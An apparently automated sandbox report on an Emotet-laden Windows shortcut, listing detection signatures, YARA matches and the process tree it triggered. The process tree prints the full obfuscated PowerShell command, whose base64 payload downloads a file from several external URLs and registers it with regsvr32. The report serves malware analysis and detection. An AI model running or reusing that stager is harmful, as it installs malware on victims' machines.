Windows
Analysis Report
RechnungsDetails 2022.20.05_1044.lnk
Overview
General Information
Detection | Emotet
---|---
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Suspicious powershell command line found
Machine Learning detection for sample
Suspicious command line found
Powershell drops PE file
Obfuscated command line found
Machine Learning detection for dropped file
Yara detected Obfuscated Powershell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- cmd.exe (PID: 7040, cmdline: `C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}`, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  - conhost.exe (PID: 7060, cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1`, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - powershell.exe (PID: 7100, cmdline: `powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"`, MD5: 95000560239032BC68B4C2FDFCDEF913)
  - regsvr32.exe (PID: 3008, cmdline: `"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP`, MD5: D78B75FC68247E8A63ACBA846182740E)
  - regsvr32.exe (PID: 6180, cmdline: `C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"`, MD5: D78B75FC68247E8A63ACBA846182740E)
- svchost.exe (PID: 1592, cmdline: `C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS`, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 2860, cmdline: `C:\Windows\System32\svchost.exe -k netsvcs -p`, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6244, cmdline: `C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService`, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6612, cmdline: `C:\Windows\System32\svchost.exe -k netsvcs -p`, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5900, cmdline: `C:\Windows\System32\svchost.exe -k netsvcs -p`, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 3000, cmdline: `C:\Windows\System32\svchost.exe -k netsvcs -p`, MD5: 32569E403279B3FD2EDB7EBD036273FA)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth | 
 | JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security | 

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | 
 | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | 
 | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | 
 | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | 
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 

Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | 
 | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | 
 | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | 
 | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | 
No Sigma rule has matched
No Snort rule has matched
AV Detection | 
---|---
Source: | ReversingLabs:
Source: | Avira URL Cloud:
Source: | Avira URL Cloud:
Source: | URL Reputation:
Source: | Avira URL Cloud:
Source: | Avira URL Cloud:
Source: | Avira URL Cloud:
Source: | Avira URL Cloud:
Source: | URL Reputation:
Source: | Avira URL Cloud:
Source: | Avira URL Cloud:
Source: | Avira URL Cloud:
Source: | Virustotal:
Source: | Metadefender:
Source: | ReversingLabs:
Source: | Joe Sandbox ML:
Source: | Joe Sandbox ML:
Source: | Code function: 4_2_00000001800248B0

Networking | 
---|---
Source: | Network Connect:
Source: | ASN Name:
Source: | ASN Name:
Source: | IP Address:
Source: | HTTP traffic detected: